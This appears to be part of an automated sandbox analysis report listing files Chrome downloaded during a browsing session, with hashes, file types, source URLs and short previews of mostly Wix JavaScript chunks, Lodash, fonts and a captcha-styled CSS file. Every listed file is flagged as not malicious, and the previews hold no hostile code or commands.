                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[2970],{65282:(t,i,o)=>{o.d(i,{EW:()=>S,HN:()=>d,QZ:()=>O,vP:()=>p});var r=Symbol.for("preact-signals");function n(){if(f>1)f--;else{for(var t,i=!1;void 0!==e;){var o=e;for(e=void 0,h++;void 0!==o;){var r=o.o;if(o.o=void 0,o.f&=-3,!(8&o.f)&&c(o))try{o.c()}catch(o){i||(t=o,i=!0)}o=r}}if(h=0,f--,i)throw t}}var s=void 0;var e=void 0,f=0,h=0,v=0;function u(t){if(void 0!==s){var i=t.n;if(void 0===i||i.t!==s)return i={i:0,S:t,p:s.s,n:void 0,t:s,e:void 0,x:void 0,r:i},void 0!==s.s&&(s.s.n=i),s.s=i,t.n=i,32&s.f&&t.S(i),i;if(-1===i.i)return i.i=0,void 0!==i.n&&(i.n.p=i.p,void 0!==i.p&&(i.p.n=i.n),i.p=s.s,i.n=void 0,s.s.n=i,s.s=i),i}}function d(t){this.v=t,this.i=0,this.n=void 0,this.t=void 0}function p(t){return new d(t)}function c(t){for(var i=t.s;void 0!==i;i=i.n)if(i.S.i!==i.i||!i.S.h()||i.S.i!==i.i)return!0;return!1}function a(t){for(var i=t.s;void 0!==i;i=i.n){var o=i.S.n;if(void 0!==o&&(
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 39408, version 1.0
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):39408
                                                                                                                                                                                                                        Entropy (8bit):7.993835607031632
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:768:r/19M5GxKiA6hDVv5cLuAweb3EB5ekEbY+rIof/VG3vdLLxmuzQZuLgWxqp4kEsY:r/19CGxVNL2VwKUXkbWESvdPxmxuDxqu
                                                                                                                                                                                                                        MD5:6005EB7FB9DB0B6F4834378EA21DBDE3
                                                                                                                                                                                                                        SHA1:ECFA867E7343D6ACACD030AC36BF714B8B4610BF
                                                                                                                                                                                                                        SHA-256:F6B2854EEC8FAC48964DA257B70B229819A77FC9341330E0A44ABACBF83EA2F1
                                                                                                                                                                                                                        SHA-512:25605A9F361502BC5E8B64CC048F87DE37354E79C23EFEE52AED07DB5834F43EB92DD6DFC2A0C9CEE40AA5438C906C6A801E754F5F59E942A34FB9B928CC1DA6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/tag-bundler/api/v1/fonts-cache/googlefont/woff2/s/ebgaramond/v12/SlGUmQSNjdsmc35JDF1K5GR1SDk_YAPI.woff2
                                                                                                                                                                                                                        Preview:wOF2..............<....~..........................(..H...?HVAR. .`?STAT|'".../L........?..p.0....6.$..\. ..z...[..Q..aG.^.m.P6..+=..jo..z3!.)....a..L3.,....Q.1.b.u.!.......l.Tp*.X..k5.P..m..w.....{i.....$).@.@#."....i8X.KP...2!<.QA8.A..N...k..H.os.5Q.../8...>....j.4.?..gN......t.v. ...._......2l>)10.a.5..H....#.........L^......TR`.).X..{g.......7..sO.~Q..G..<0.z.........s...9.V....K.EZM.E..r6g.....K.v.\.!.DH...U.h..+-.4. ..*...^].e..c.S..$'}`......>.!...Y$....i.i...F|..yB...?=k.../...Id.l!k..Vi....f}bR.[T<2.@D... ..m.^Q....J".x.G.x....H..#...[9.bCle.!;.!g...._?....0uX...K.-...#'|l.d.Y.l...u...HzBS`.......WTWUkg........-....F..~*.F.....B.R.t4..R.(T..B{~..J.R.w...aEu..4..E.U.vuV....].pa...o.:R;'..B../t&....&.....Iv9.eP.....`^]...4h...8.x./.....Q[.LQ...>.C..'.B.|`n.....kZg.a[]Q!..8..#.HDl.y...k.J0h.l....9..Hi..|TJ.z.".........o..V.3/...k.%.Lf.`.F..a..|.../7...........-/h.u.`R..i.z".F0.`....q...TV\.,'C.#|...A..7..8.....BV.... px..J..9|D./.5w.......
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (572)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):689
                                                                                                                                                                                                                        Entropy (8bit):5.4386301475810175
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:+k9Gm9e5kA273tWfFOx+4+PKm/WRFXoVHvARBUmz2rE5TtClRyB3+hGiglj5:z/k5k15WfFM+PdeRF4VGLzr5T0yB3kgP
                                                                                                                                                                                                                        MD5:A0ECC37AADDBA206911FA5C067B2825B
                                                                                                                                                                                                                        SHA1:4680F416E9A39543B66A68EE76C635EF725805D3
                                                                                                                                                                                                                        SHA-256:A3078B398C315295D7A5B64B9EDE84C4D3C5215E064034F0C50692FC76AAF135
                                                                                                                                                                                                                        SHA-512:BD6ABF6CB882B0AD7D0F2D03C5F33E6083C6AADC2214EEFBA0632972B3D17A797D5C2FD69490DF98AC5F53DB69D4824DEE02E56D9A00A49DD22A59E9CA3CA20F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/group_28.a74cf8a9.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[7265],{33368:(e,t,r)=>{r.r(t),r.d(t,{editorPage:()=>b,page:()=>g});var n=r(20636),o=r(77748);const a=["VerticalMenu"],p="ExpandableMenu",l="DropDownMenu",s="StylableHorizontalMenu";var u=r(71085);const c=(e,t)=>r=>({componentTypes:e,componentWillMount:e=>{const n=r.getFullUrlWithoutQueryParams();e.updateProps({[t]:n})}}),i=(0,o.Og)([u.$1],c([...a,s],"currentPageHref")),_=(0,o.Og)([u.$1],c([p,l],"currentPrimaryPageHref")),g=e=>{e(n.ls).to(i),e(n.ls).to(_)},b=g}}]);.//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/group_28.a74cf8a9.chunk.min.js.map
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4143)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):73015
                                                                                                                                                                                                                        Entropy (8bit):5.342744191670081
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:X9ylPegosd1p8X4Kx2iiC0guaihfaZgb9pL/:X9cVaizgehfaZCX/
                                                                                                                                                                                                                        MD5:9BECC40FB1D85D21D0CA38E2F7069511
                                                                                                                                                                                                                        SHA1:AE854B04025DB8B7F48FDD6DEDF41E77EAE44394
                                                                                                                                                                                                                        SHA-256:A9705DFC47C0763380D851AB1801BE6F76019F6B67E40E9B873F8B4A0603F7A9
                                                                                                                                                                                                                        SHA-512:585374E3CE3AB1D28C20FE4B28DA6131A5B353B629332094DB8E5EB4ADE0FF601161B3CAF546F5F1E1BE96353DEAA29109687EAAE098EF279F4A6964430D4035
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:/**. * @license. * Lodash <https://lodash.com/>. * Copyright OpenJS Foundation and other contributors <https://openjsf.org/>. * Released under MIT license <https://lodash.com/license>. * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>. * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors. */.(function(){function n(n,t,r){switch(r.length){case 0:return n.call(t);case 1:return n.call(t,r[0]);case 2:return n.call(t,r[0],r[1]);case 3:return n.call(t,r[0],r[1],r[2])}return n.apply(t,r)}function t(n,t,r,e){for(var u=-1,i=null==n?0:n.length;++u<i;){var o=n[u];t(e,o,r(o),n)}return e}function r(n,t){for(var r=-1,e=null==n?0:n.length;++r<e&&t(n[r],r,n)!==!1;);return n}function e(n,t){for(var r=null==n?0:n.length;r--&&t(n[r],r,n)!==!1;);return n}function u(n,t){for(var r=-1,e=null==n?0:n.length;++r<e;)if(!t(n[r],r,n))return!1;.return!0}function i(n,t){for(var r=-1,e=null==n?0:n.length,u=0,i=[];++r<e;){var o=n[r];t(o,r,n)&&(i[u++]=o)}return i}function o(n
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1017
                                                                                                                                                                                                                        Entropy (8bit):5.1518305909584425
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:+k9Gm9e7EW3HRF1MnSlYjYNIJtG51CtTtKWEr1chdUpci6WvqGLPEaEL+SOm3I+V:z/k7Z3RFXlKT1kNrYypfvLWL3Onkg7O
                                                                                                                                                                                                                        MD5:03C1E10720544532E4C6AD6C77551D15
                                                                                                                                                                                                                        SHA1:9E138E01CF9B05526A9D7A0D3EE4D1CCD440D6E4
                                                                                                                                                                                                                        SHA-256:C1C11062E0B9E0CE036CACD15296D918EF035EC939E4CC6CE92115FF2FED60F8
                                                                                                                                                                                                                        SHA-512:523D034AD811A6CA31ABE781B483D39320F18BEBA14B2769F2608ADBE660CF47303E3E12DA57131C8D08FF14C0C00A9A0D983D0E90D7F3545594760B61A5C6E0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/onloadCompsBehaviors.a5af195f.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[695,5377],{69434:(i,t,n)=>{n.d(t,{N:()=>m});const l={visibility:"hidden !important",overflow:"hidden !important",height:"0 !important",width:"0 !important","min-width":"0 !important","min-height":"0 !important","margin-bottom":"0 !important","margin-left":"0 !important","margin-right":"0 !important",padding:"0 !important"},o={...l,position:"absolute !important","margin-top":"0 !important"},e={visibility:null,overflow:null,height:null,width:null,"min-width":null,"min-height":null,"margin-bottom":null,"margin-left":null,"margin-right":null,padding:null},p={...e,position:null,"margin-top":null},a={visibility:"hidden !important"},r={visibility:null},m=({isResponsive:i})=>({getCollapsedStyles:()=>i?o:l,getExpandedStyles:()=>i?p:e,getHiddenStyles:()=>a,getShownStyles:()=>r})}}]);.//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/onloadCompsBehaviors.a5af195f
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (688)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):805
                                                                                                                                                                                                                        Entropy (8bit):5.416474889124371
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:z/kH0QfYi/eFfo9mrkwNXqwOLmXrMLXrn/e2ZaFPLkgw:U00zacqkiXJXqXTecOjS
                                                                                                                                                                                                                        MD5:E65B3E16D1790E074ABFD552358F79A2
                                                                                                                                                                                                                        SHA1:7FA9E0399CE9E9EB824F05E191A58700F03D7A2F
                                                                                                                                                                                                                        SHA-256:BD20169FD826981686DF7F087AE1EBF629ED1A4000490FC108331FB28A6583BD
                                                                                                                                                                                                                        SHA-512:AFA756E23123BD7AB6D7DCE0474A56A4A0D693F5EEC1BCF1191B50EF9C4129817F7F26694748B7BDADAAD7D5888468EC0D5110A74F5F73697843B633702255C3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[9896],{94109:(e,s,n)=>{n.r(s),n.d(s,{page:()=>u});var o=n(62155),a=n.n(o),p=n(77748),t=n(20590),i=n(478),l=n(9858),d=n(69434);const c=(0,p.Og)([(0,p.KT)(t.Gp,l.U),i.e],((e,s)=>({name:"onloadCompsBehaviors",pageWillMount(){const{compsBehaviors:n}=e,o=(0,d.N)({isResponsive:!0}),p=(0,d.N)({isResponsive:!1}),t=a().mapValues(n,(({collapseOnLoad:e,hiddenOnLoad:s,isResponsiveComponent:n})=>{const a=n?o:p,t={};return e&&Object.assign(t,a.getCollapsedStyles()),s&&Object.assign(t,a.getHiddenStyles()),t}));s.update(t)}})));var r=n(16537);const u=e=>{e(r.$.PageWillMountHandler).to(c)}}}]);.//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/group_36.dabdc384.chunk.min.js.map
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34527)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):34643
                                                                                                                                                                                                                        Entropy (8bit):5.435302897493357
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:ayQ3y6nduH+QsvhU34+6DLnk2KKZaupiS11bDaQhCLoaVTIjTGTiuK4y+aNsFwkJ:aJzZjnEXVEbEt6FjcnIdA0qLmmuuh8qn
                                                                                                                                                                                                                        MD5:5FD90FAF2C188202D6C4D15BAFEEB084
                                                                                                                                                                                                                        SHA1:D6AA0630BAFA6FEE85C99B62ABB0EE697FC7066F
                                                                                                                                                                                                                        SHA-256:91EFCF4CF8ED21A8A1277892416644E9563FFFB4CDEC1E5CAD3C5AD9EF39D7E8
                                                                                                                                                                                                                        SHA-512:BA90FC38CAFB0FCB7544024530C08955027384AE400E0E863975C54202ED3EC364397E4FD6FC804467D81BB9B5B7732DB700101655A3A66616EF4EC1C0D42EEB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[6469],{18447:(e,t,r)=>{"use strict";r.r(t),r.d(t,{OnLinkClickSymbol:()=>n.c7,PreviewTooltipCallback:()=>f,PreviewTooltipCallbackSymbol:()=>n.pK,name:()=>n.UU,site:()=>b});var n=r(93455),o=r(77748),a=r(32166),i=r(82658),s=r(41594),l=r.n(s);const d=(0,o.Og)([a.RV,n.c7,a.TQ],((e,{onLinkClick:t},r)=>({appDidMount:()=>{if(!(0,i.fU)(e))return e.addEventListener("click",t),r.mode.debug&&l().version.startsWith("18")&&Array.from(document.querySelectorAll?.("a")||[]).map((e=>e.addEventListener("click",t))),()=>{e.removeEventListener("click",t)}}})));var c=r(16537),u=r(10553),p=r(12482),g=r(48603),m=r(45468);const h=(e,t)=>!t["specs.thunderbolt.lightboxFromButton"]||e&&"button"!==e.tagName.toLowerCase(),y=(0,o.Og)([u.n,p.Fh,(0,o.m3)(p.y7),a.RV],((e,t,r,n)=>{const o=[],a=[];return{onLinkClick:async n=>{let i=!0;if(n.metaKey||n.ctrlKey)return;const s=((e,t)=>{let r=e.target;for(;r&&(!r.tagName||"a"!==r.tagNam
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):250949
                                                                                                                                                                                                                        Entropy (8bit):5.364615104718801
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:eTK6NapLyLitzqNLMDIpypa2SMcu9Iiv8GBi4k9+ZHkROK0mzA0p0OqmIP:eTK6NapLyLizqNLMDIpypa2SMcPiv8v4
                                                                                                                                                                                                                        MD5:50777A3F69F6F3C8DE78FA49E9DD9F43
                                                                                                                                                                                                                        SHA1:4CE01B79203D7CDD2F8439DDA437107020D1048C
                                                                                                                                                                                                                        SHA-256:A8BE64044A27BF55851FF8BCB053F6C84645B6E86BF5651A0E59BFC4C0928604
                                                                                                                                                                                                                        SHA-512:2554C11BDEE50F0A36E0EED65C99D78338C1250ADB379324F4F81C2CCEB52158BDC7563FA142008439A0FAAC6BB614A3818244BF73244AB8CF7554DD40893005
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[3671],{80807:(e,t,a)=>{a.r(t),a.d(t,{Animations:()=>Pa.Qw,EditorAnimationsSym:()=>Pa._H,name:()=>Pa.UU,page:()=>Pw});var n={};a.r(n),a.d(n,{animate:()=>Ja,name:()=>Ga,properties:()=>Za});var i={};a.r(i),a.d(i,{animate:()=>nn,name:()=>en,properties:()=>tn});var r={};a.r(r),a.d(r,{animate:()=>sn,name:()=>rn,properties:()=>on});var o={};a.r(o),a.d(o,{animate:()=>In,name:()=>Sn,properties:()=>Mn});var s={};a.r(s),a.d(s,{animate:()=>Rn,name:()=>Fn,properties:()=>$n});var d={};a.r(d),a.d(d,{animate:()=>An,name:()=>Cn,properties:()=>En});var c={};a.r(c),a.d(c,{animate:()=>Xn,name:()=>Yn,properties:()=>Dn});var u={};a.r(u),a.d(u,{animate:()=>Vn,name:()=>qn,properties:()=>Hn});var l={};a.r(l),a.d(l,{animate:()=>Ln,name:()=>Nn,properties:()=>zn});var m={};a.r(m),a.d(m,{animate:()=>Wn,name:()=>Un,properties:()=>jn});var p={};a.r(p),a.d(p,{animate:()=>Zn,name:()=>Qn,properties:()=>Kn});var f={};
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1427
                                                                                                                                                                                                                        Entropy (8bit):4.735993187968474
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:3wMQr6PqcLvS3nMWMbvSh1Mt/F7dxaK1s5q3wb3IGT4cq3ANh/FBq3lr7KTI1KZb:3wMQQqEqboqh1ON7dTs5UFcDNBOiTIkR
                                                                                                                                                                                                                        MD5:A3241CD157609960EC893D8EF01A0F65
                                                                                                                                                                                                                        SHA1:BAE7462204AB5E33E2DF39235C378AD66A1B9DAD
                                                                                                                                                                                                                        SHA-256:B81E2A642219AEC07357993C6FBBECA88CEE10606E432E317263989D5FCC8BDE
                                                                                                                                                                                                                        SHA-512:70B19E32A64BB8CBB189CF7E1EEFCBF0D4DB1BF2898651FD1BB07BC8B8CE9041CA4001EEF8B451092E9182F279A340EE6ADB253D52B1AE03DC61F58390DC67CF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/samhentir/css/init.css?v=1736517172
                                                                                                                                                                                                                        Preview:*{.. margin: 0;.. padding: 0;.. box-sizing: border-box;..}..body {.. font-family: 'Segoe UI', sans-serif;..}...capboxi{.. position: absolute;.. width: 100%;.. top: 40% !important;.. left: 50% !important;.. transform: translate(-50%, -50%) !important;..}...capboxi22{.. display: flex;.. align-items: center;.. justify-content: space-between;.. width: 25%;.. margin: 30px auto;.. padding: 10px;.. background-color: #FAFAFA;.. border: 1px solid #d4d2d2;.. border-radius: 3px;..}...boxCapin{.. display: flex;.. align-items: center;..}...boxCapin label{.. cursor: pointer;..}...imgtx{.. text-align: center;.. line-height: 5px;..}...imgtx a{.. display: inline-block;.. font-size: 11px;.. padding-bottom: 10px;.. color: #000;.. font-weight: 200;..}...btinp input{.. width: 15px;.. height: 15px;.. border: 1px solid #eee;.. outline: none;..}...btinp img {.. display: inline-block;.. width: 35px;.. heigh
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 86 x 35, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1537
                                                                                                                                                                                                                        Entropy (8bit):7.810936663323954
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:Z+9+kRUIwA4b8pBvnkF8hvPin+LxkkcJD:2UVunVZO+AJD
                                                                                                                                                                                                                        MD5:646F1AA3EA056447F8DE3295BD070784
                                                                                                                                                                                                                        SHA1:B7C7464BD8ABDD9A3FA892A65D079C1B79CAF8D1
                                                                                                                                                                                                                        SHA-256:E3A7FA5F9B8F772F856CB84B2526DA49AFA790B2526EEC03AF926B0BA0B08606
                                                                                                                                                                                                                        SHA-512:53A582DC85C0898B2266ACEC66748682B1730906676F648C4CAD5FC02709DE0C744227180CBDE998624DD2F8150581DFA108858CF1C6E460C16259C4189DD8B1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/samhentir/img/flaretext.png
                                                                                                                                                                                                                        Preview:.PNG........IHDR...V...#.............sRGB.........gAMA......a.....pHYs..........o.d....IDAThC.kL.U....B.......&.!...4....&"...6*E.Mi..".%@".QQ....&.<.T.FA........( B.B.....8.9..f..R6.....g..w>.sgp.$...?v.....B..Z..X.q....G@l......w.`..).*_...}.-.s....F...$._...i...M.6.m.......|.+..p..H.&.-3.}...By.W.).o?.g&6/V.)....@.s..9.X./=Ju>.[y..P.IU'......u...s.........r....Z../s...B.....A.O...".[b@....g =X..o....(O......;.@..f...@...A.m.]...b..A...R5H.....7V-Vw.6..>...0..PZ.Oy..2W...<H[;.HX.X..m...e7..}|].j.@.}...de.|...+.k.[ ...bG.=...Bekv.t.........m......\.;.T...W..j.J........V...}../.../..Il.J...,...n...s.V.0.o..H.U .~.r....\.....s5X.X.f._.~..i......@..\..#..ccX...'.R..iy....L-./r.X....B....P.N.E.....b....;v...,....088..(r.;.............W...@gg'.t.C....L.]]]....ppp |}}...j.......PQXX..........T........Z....).......>......0::.^_YY...7n..[.(niiQ..2..;F.455..***..\]]!<<.:::.|``..G......bRlrr25....UUU.............Ilkk+]..........Jqo.~.m...<....///8~.8..@y..
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4030
                                                                                                                                                                                                                        Entropy (8bit):5.0833228093741285
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:fzL2R2ZOpTKn77LvDluhXnWGXMVoss94lUS9vkA/P7VuJvYY8SLNBgwt7eVYDffr:fzL2R2ZOpTKn77LvZuhXnWGXeVs94lh2
                                                                                                                                                                                                                        MD5:0F364231C7BBBCBF4AF5F7BAFFF7EFF4
                                                                                                                                                                                                                        SHA1:D0D48034CCF010C6454BC4EC0A70F7912215AFA7
                                                                                                                                                                                                                        SHA-256:CDFB2520854BD9416B661293E7037D1FFAB7EE02984041E7E03692473A7187C5
                                                                                                                                                                                                                        SHA-512:DCDF7C1936CD0B493DAA40223184BF50C77A9CE1333B3EDC671336318F349A44E807CCBFC2EFBC3CC76330678A618088C4241492B6DD76AF4D9691CCF45F8A13
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:{"version":"2.0","host":"thunderbolt","namespace":"dsgnsys","baseURL":"https://static.parastorage.com/services/editor-elements-design-systems/dist/thunderbolt/","model":["62a24e6f.bundle.min.js","c8d6593a.min.css"],"assets":[["stylable-metadata","editor-elements-design-systems.thunderbolt.2650d469363b6c5420f6bde66b0a6871930e53ab.metadata.json"]],"components":{"ControlTypes":["e155d4ef.bundle.min.js","ed5c76cf.min.css"],"DashboardButton":["23a1b43e.bundle.min.js","2b9dee80.min.css"],"DashboardHeading":["6f784ddd.bundle.min.js","3f1d8bf5.min.css"],"DashboardIconButton":["079a0737.bundle.min.js","ecd37ae9.min.css"],"DashboardInfoIcon":["f79d7931.bundle.min.js","fc3ba9fa.min.css"],"DashboardInput":["c6646481.bundle.min.js","fbb3dfe7.min.css"],"DashboardNumberInput":["e3a4236b.bundle.min.js","fbb3dfe7.min.css"],"DashboardTextButton":["c9545b02.bundle.min.js","1ede16d1.min.css"],"DashboardText":["61966aef.bundle.min.js","95f82792.min.css"],"DashboardToggleSwitch":["16bbf963.bundle.min.js","1
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3692)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3813
                                                                                                                                                                                                                        Entropy (8bit):5.357533276773501
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:6Fa1Ks9i03n8aTI67FlSUUG2hjKgUbCL32CZvKyvW47VMUy:6hP0Xb/MUUTNMkm+fW4hMUy
                                                                                                                                                                                                                        MD5:015C8673A81EE2BAD9238CF5B7B85857
                                                                                                                                                                                                                        SHA1:E9A16FF3B8BC4C4580EA651DE0FD76F831F77A70
                                                                                                                                                                                                                        SHA-256:335F6EC02E6F666E2E6AAD2BB8F61904DE3891E9475942F44B25FF91A50A9648
                                                                                                                                                                                                                        SHA-512:2020CEBDECA36C23CDFB68338FB1CCC00EA7AB90179B451437214B363F7D7C320F0F0DD5DF7495FA6A18A3B4E109210A85D23D63E7E8D9C6E97B924BBDD65E3A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[569,5445],{33615:(e,t,a)=>{a.r(t),a.d(t,{ProtectedPagesApiSymbol:()=>S,page:()=>U,site:()=>y});var s,o=a(77748),n=a(20590),r=a(54563);!function(e){e.SM="SM",e.Pass="PASS",e.NONE="NONE"}(s||(s={}));const i=(0,o.Og)([(0,o.KT)(n._K,r.U),(0,o.KT)(n.YG,r.U),(0,o.KT)(n.wk,r.U)],((e,t,a)=>{const o=a=>{const o=e.pagesSecurity[a];return o&&o.requireLogin?s.SM:t.passwordProtected[a]||o&&o.passwordDigest?s.Pass:s.NONE};return{async handle(t){if(t.pageJsonFileName)return t;const n=t.pageId,{pagesMap:r,loginAndNavigate:i,authenticateUsingSitePassword:g,completedSitePasswordAuth:p}=a.get();if(r[n])return{...t,pageJsonFileName:r[n]};if(o("masterPage")===s.Pass&&!p)return g(t),null;const c=o(n);return c===s.NONE&&((e,t)=>{throw new Error(`we do not have authentication info for protected page ${e} page security: ${t}`)})(n,e.pagesSecurity[n]),i(t,c),null}}}));var g=a(71085),p=a(66397),c=a(19889),u=a(
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (307)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):432
                                                                                                                                                                                                                        Entropy (8bit):5.471235433884373
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:+hfrPS9G3frPS9urigWAA2DFI8V2aHEfLAdw4V6xBUqwDmqGZ7hk+cGyAGDTSgis:+k9Gm9eig9DFIDyqaD7P+hGigiuv
                                                                                                                                                                                                                        MD5:EA9D97FFD7BBAA28A8C1E36592411AF1
                                                                                                                                                                                                                        SHA1:863AB9051B8CBB7709964F02905645D7FD649FE4
                                                                                                                                                                                                                        SHA-256:1EE778F89436B58A0CF5C41659A917CFB927A10558FF736378C4B8F37311845F
                                                                                                                                                                                                                        SHA-512:C74407D558D74F585E835A05D149F41BA5120466D21A46165CA66B59D48FECA9E71E4139D2BB090930F1789CC9AD84675113102E54E0348586BEBCF579D07677
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[1274,6850],{35256:(t,e,n)=>{n.d(e,{Z:()=>r});var p=n(23184);const r=t=>t.react18Compatible&&!a()&&"react-native"!==p.env.RENDERER_BUILD,a=()=>{try{return window.self!==window.top}catch(t){}return!1}}}]);.//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/componentsLoader.8acadaf2.chunk.min.js.map
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15406
                                                                                                                                                                                                                        Entropy (8bit):4.967552114438246
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:2xApRWtvbsjgIYYQlV47U/1z8QsCj99/R1qa/PRZs6M75m4vU6GCi28urvZQYH3:FRIwcVeq8wjjLENG72tl
                                                                                                                                                                                                                        MD5:31D62B976C16DB52CBF0D5631BCDE62C
                                                                                                                                                                                                                        SHA1:18F2D0B838D766B642E787E222075DDFF5285662
                                                                                                                                                                                                                        SHA-256:04663FB0B01FC27B402519F0B000DB2B98EF3754C8C99C21E304262D2353AB62
                                                                                                                                                                                                                        SHA-512:104E20B3977B6ADAF6847D62199656A4E93CA3478D78335DBA65B807C4375E8AA3FB41BD12B3EA0CF11C689C21BC1486DA063415372F4AD090D95DC2517880E1
